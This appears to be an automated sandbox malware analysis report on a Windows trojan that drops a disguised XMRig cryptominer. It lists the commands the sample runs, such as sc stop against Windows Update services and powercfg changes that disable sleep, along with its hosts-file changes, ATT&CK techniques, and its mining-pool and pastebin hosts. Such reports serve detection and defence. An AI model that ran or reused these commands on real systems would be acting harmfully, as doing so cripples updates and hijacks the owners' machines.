Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF68D3D1B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

14_2_00007FF68D3D1B54

Source: C:\Windows\System32\winlogon.exe

Code function: 23_2_000002D0165E7960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

23_2_000002D0165E7960

Source: C:\Windows\System32\dialer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Modifies the hosts file

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 File and Directory Permissions Modification	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	11 Windows Service	11 DLL Side-Loading	2 Disable or Modify Tools	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	Security Account Manager	24 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Windows Service	1 Abuse Elevation Control Mechanism	NTDS	431 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	813 Process Injection	2 Obfuscated Files or Information	LSA Secrets	2 Process Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	3 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	4 Rootkit	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Masquerading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Modify Registry	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	131 Virtualization/Sandbox Evasion	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Access Token Manipulation	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	813 Process Injection	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood
Identify Business Tempo	Botnet	Hardware Additions	Python	Hypervisor	Process Injection	1 Hidden Files and Directories	Credential API Hooking	Domain Groups	Exploitation of Remote Services	Remote Email Collection	External Proxy	Transfer Data to Cloud Account	Reflection Amplification

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
hiwA7Blv7C.exe	61%	ReversingLabs	Win64.Trojan.Leonem
hiwA7Blv7C.exe	100%	Avira	TR/Rozena.qmghx
hiwA7Blv7C.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp	100%	Avira	RKIT/Agent.dvyic
C:\Program Files\Google\Chrome\updater.exe	100%	Avira	TR/Rozena.qmghx
C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp	100%	Joe Sandbox ML
C:\Windows\Temp\bzqlyietdwsj.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	61%	ReversingLabs	Win64.Trojan.Leonem
C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp	87%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\Windows\Temp\bzqlyietdwsj.tmp	62%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Windows\Temp\libtqlibdoyd.sys	5%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://crl.cloudflare.com/origin_ca.crlv	0%	Avira URL Cloud	safe
http://crl.cloudflare.com/origin_ca.crl)on	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xmr-eu1.nanopool.org	54.37.137.114	true	false		high
pastebin.com	172.67.19.24	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/mJdpKdhr	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crlv	dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.cloudflare.com/origin_ca0	dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/mJdpKdhr&	dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/mJdpKdhr--cinit-stealth-targets=Taskmgr.exe	dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crl0	dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/mJdpKdhrbdoyd.	dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/mJdpKdhrTaskmgr.exe	dialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325227158.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135784569.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/mJnit-	dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/mJdpKdhr4wO	dialer.exe, 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.cloudflare.com/origin_ca(E	dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crl)on	dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crl	dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xmrig.com/docs/algorithms	dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/P	lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://ocsp.cloudflare.com/origin_ca	dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 0000001B.00000002.3325227158.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135784569.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/mJ	dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
51.15.58.224	unknown	France	12876	OnlineSASFR	false
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	false
54.37.137.114	xmr-eu1.nanopool.org	France	16276	OVHFR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583518
Start date and time:	2025-01-02 23:25:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	10
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hiwA7Blv7C.exe renamed because original name is a hash value
Original Sample Name:	882b403dcc4c6928de9d4a86bf4fbb650909485e828cba37258d68be81340739.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.mine.winEXE@68/18@2/3
EGA Information:	Successful, ratio: 86.7%
HCA Information:	Successful, ratio: 61% Number of executed functions: 68 Number of non-executed functions: 352
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 40.126.31.67, 40.126.31.71, 20.190.159.71, 40.126.31.73, 20.190.159.68, 20.190.159.75, 20.190.159.0, 20.190.159.2, 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target hiwA7Blv7C.exe, PID 1908 because it is empty
Execution Graph export aborted for target updater.exe, PID 6556 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: hiwA7Blv7C.exe

Simulations

Behavior and APIs

Time	Type	Description
17:25:52	API Interceptor	1x Sleep call for process: hiwA7Blv7C.exe modified
17:25:54	API Interceptor	33x Sleep call for process: powershell.exe modified
17:25:58	API Interceptor	1x Sleep call for process: updater.exe modified
17:26:30	API Interceptor	343024x Sleep call for process: winlogon.exe modified
17:26:31	API Interceptor	261918x Sleep call for process: lsass.exe modified
17:26:31	API Interceptor	1558x Sleep call for process: svchost.exe modified
17:26:33	API Interceptor	329262x Sleep call for process: dwm.exe modified
17:26:37	API Interceptor	1849x Sleep call for process: dialer.exe modified
23:25:57	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51.15.58.224	gaozw40v.exe	Get hash	malicious	Xmrig	Browse
	LfHJdrALlh.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	aA45th2ixY.exe	Get hash	malicious	Xmrig	Browse
	25C1.exe	Get hash	malicious	Glupteba, Xmrig	Browse
	8EbwkHzF0i.exe	Get hash	malicious	Xmrig, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig	Browse
	file.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig	Browse
	file.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse
172.67.19.24	rrats.exe	Get hash	malicious	AsyncRAT	Browse	pastebin.com/raw/KKpnJShN
	sys_upd.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm2.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_hiddenz.ps1	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
54.37.137.114	gaozw40v.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Get hash	malicious	Xmrig	Browse
	ft1i6jvAdD.exe	Get hash	malicious	Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	CRf9KBk4ra.exe	Get hash	malicious	DCRat	Browse	172.67.19.24
	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	bad.txt	Get hash	malicious	AsyncRAT	Browse	104.20.3.235
	dlhost.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	htkeUc1zJ0.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	c2.exe	Get hash	malicious	Xmrig	Browse	104.20.4.235
	Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk	Get hash	malicious	Unknown	Browse	172.67.19.24
